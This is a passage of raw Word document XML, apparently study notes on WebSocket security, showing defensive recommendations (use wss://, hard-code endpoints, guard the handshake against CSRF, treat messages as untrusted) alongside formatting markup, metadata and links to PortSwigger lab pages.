        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00100A75">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>wss://</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A75">
        <w:t xml:space="preserve"> protocol (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00100A75">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100A75">
        <w:t xml:space="preserve"> over TLS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613F79CF" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00100A75" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00100A75">
        <w:t xml:space="preserve">Hard code the URL of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00100A75">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100A75">
        <w:t xml:space="preserve"> endpoint, and certainly don't incorporate user-controllable data into this URL. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B30F6CE" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00100A75" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00100A75">
        <w:t xml:space="preserve">Protect the WebSocket handshake message against CSRF, to avoid cross-site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00100A75">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100A75">
        <w:t xml:space="preserve"> hijacking vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EC3DCD" w14:textId="5326BFDF" w:rsidR="007403CE" w:rsidRPr="00BE3CE2" w:rsidRDefault="00C80472" w:rsidP="00031A31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00100A75">
        <w:t>Treat data received via the WebSocket as untrusted in both directions. Handle data safely on both the server and client ends, to prevent input-based vulnerabilities such as SQL injection and cross-site scripting.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007403CE" w:rsidRPr="00BE3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7C6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B57E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37782"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12FEE4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B359C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F98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E11F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D32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96014"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="47EA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94825"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F014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F0C5A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A54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70B95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07D8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63C5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79FA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91E6C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79F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E05E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7602B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F04376"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEC094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EA643A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE30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C0098"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD5C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133A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C300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CA3F96"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="623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C3D9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F508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6055A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0D0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5563D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7832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D1BB6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9AC2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43C36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="68CCF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9E71D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D936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937E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67FE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4245C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6704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0D266F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61C6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1047D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2BA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F53F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A196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E2A68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="171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C73C75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="29BE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11E00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="380C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17639"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9166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124E3A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9342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1E66D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F794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6053C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E5D2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360263"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F70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8E1486"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08DE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433289">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1024018569">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="182982598">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1123352802">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="547031143">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="760301368">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1991671709">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1434596711">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="68159406">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="352416175">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1255554330">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1447773271">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1389649580">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="19210720">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="114568163">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="368997957">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2067141587">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1362197946">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1885484372">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="935791491">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="701057350">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1637569426">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1930505674">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1961642527">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="482351466">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1892840130">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="645817097">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1147043127">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1612474569">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1766880830">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="830144875">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="187716081">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="708452636">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="888810236">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1517422979">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="735473617">
    <w:abstractNumId w:val="2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452"/>
    <w:rsid w:val="00006EB7"/>
    <w:rsid w:val="00020F6A"/>
    <w:rsid w:val="00031A31"/>
    <w:rsid w:val="000433B4"/>
    <w:rsid w:val="000564A9"/>
    <w:rsid w:val="00084333"/>
    <w:rsid w:val="00135B5F"/>
    <w:rsid w:val="00140724"/>
    <w:rsid w:val="0016444C"/>
    <w:rsid w:val="00225DA5"/>
    <w:rsid w:val="002A57EA"/>
    <w:rsid w:val="00315A2A"/>
    <w:rsid w:val="00347FE9"/>
    <w:rsid w:val="003C15F6"/>
    <w:rsid w:val="003C3452"/>
    <w:rsid w:val="003F303D"/>
    <w:rsid w:val="00460935"/>
    <w:rsid w:val="004D1173"/>
    <w:rsid w:val="004F3134"/>
    <w:rsid w:val="00501BB2"/>
    <w:rsid w:val="005206F9"/>
    <w:rsid w:val="00531773"/>
    <w:rsid w:val="00561754"/>
    <w:rsid w:val="005E5516"/>
    <w:rsid w:val="00636950"/>
    <w:rsid w:val="006A20B5"/>
    <w:rsid w:val="006E778F"/>
    <w:rsid w:val="00705A05"/>
    <w:rsid w:val="00712147"/>
    <w:rsid w:val="0073028D"/>
    <w:rsid w:val="007403CE"/>
    <w:rsid w:val="007B44F0"/>
    <w:rsid w:val="00841B3B"/>
    <w:rsid w:val="008A5B57"/>
    <w:rsid w:val="008B23E1"/>
    <w:rsid w:val="008C6880"/>
    <w:rsid w:val="00913FD9"/>
    <w:rsid w:val="00944E67"/>
    <w:rsid w:val="009621B2"/>
    <w:rsid w:val="00991700"/>
    <w:rsid w:val="00A40954"/>
    <w:rsid w:val="00A56094"/>
    <w:rsid w:val="00AC4FC9"/>
    <w:rsid w:val="00B54EE9"/>
    <w:rsid w:val="00B57C91"/>
    <w:rsid w:val="00BB0327"/>
    <w:rsid w:val="00BE3CE2"/>
    <w:rsid w:val="00C6187D"/>
    <w:rsid w:val="00C626B1"/>
    <w:rsid w:val="00C80472"/>
    <w:rsid w:val="00C83B17"/>
    <w:rsid w:val="00C845BE"/>
    <w:rsid w:val="00CA0CF4"/>
    <w:rsid w:val="00D06149"/>
    <w:rsid w:val="00D1581E"/>
    <w:rsid w:val="00D3789F"/>
    <w:rsid w:val="00D55B90"/>
    <w:rsid w:val="00D76E05"/>
    <w:rsid w:val="00DB6248"/>
    <w:rsid w:val="00E002EE"/>
    <w:rsid w:val="00E50F52"/>
    <w:rsid w:val="00EE2ED3"/>
    <w:rsid w:val="00EF5018"/>
    <w:rsid w:val="00F415A2"/>
    <w:rsid w:val="00FD4E33"/>
    <w:rsid w:val="00FD5A36"/>
    <w:rsid w:val="00FE4D95"/>
    <w:rsid w:val="00FE5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86B9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C30699DF-8E66-4B0B-BE19-61A21EC4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472"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003C34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34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34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C34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4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4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34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34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C34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4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452"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="003C3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452"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003C3452"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003C3452"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003C3452"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003C34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452"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003C3452"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0016444C"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0071214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71214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21B2"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009621B2"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="009621B2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0099170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9170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swigger.net/web-security/websockets" TargetMode="External"/><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portswigger.net/web-security/websockets/what-are-websockets" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities" TargetMode="External"/><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portswigger.net/burp/documentation/desktop/settings/tools/proxy" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking/lab"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portswigger.net/web-security/websockets" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/csrf" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/websockets" TargetMode="Externa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ortswigger.net/blog/oast-out-of-band-application-security-testing" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/websockets/what-are-websockets" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId3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17</Pages>
  <Words>3354</Words>
  <Characters>19124</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>159</Lines>
  <Paragraphs>44</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22434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soyab shaikh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>soyab shaikh</cp:lastModifiedBy>
  <cp:revision>56</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-29T18:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-25T18:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>